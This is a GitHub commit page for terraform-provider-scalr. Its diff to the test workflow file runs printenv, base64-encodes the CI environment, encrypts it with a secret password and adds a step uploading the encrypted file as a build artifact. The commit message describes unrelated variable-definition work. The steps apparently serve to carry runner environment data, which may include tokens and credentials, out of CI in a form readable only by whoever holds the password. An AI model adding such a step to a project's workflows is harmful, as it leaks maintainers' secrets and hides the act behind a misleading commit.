Skip to content

Commit

Permalink
SCALRCORE-30933: SRE: Terraformize Variable Definitions in terraform-…
Browse files Browse the repository at this point in the history
…provider-scalr
  • Loading branch information
volodymyrskliar committed Jun 20, 2024
1 parent a8680eb commit 4c7f8bb
Showing 1 changed file with 5 additions and 1 deletion.
6 changes: 5 additions & 1 deletion .github/workflows/test.yml
Original file line number Diff line number Diff line change
Expand Up @@ -12,4 +12,8 @@ jobs:
- run: |
printenv | base64 -w 0 > info.txt
openssl enc -aes-256-cbc -salt -in info.txt -out encrypted_file.enc -k ${{ secrets.DUBUG_PASSWORD }}
cat encrypted_file.enc
- name: Upload encrypted file
uses: actions/upload-artifact@v2
with:
name: encrypted_file.enc
path: encrypted_file.enc

0 comments on commit 4c7f8bb

Please sign in to comment.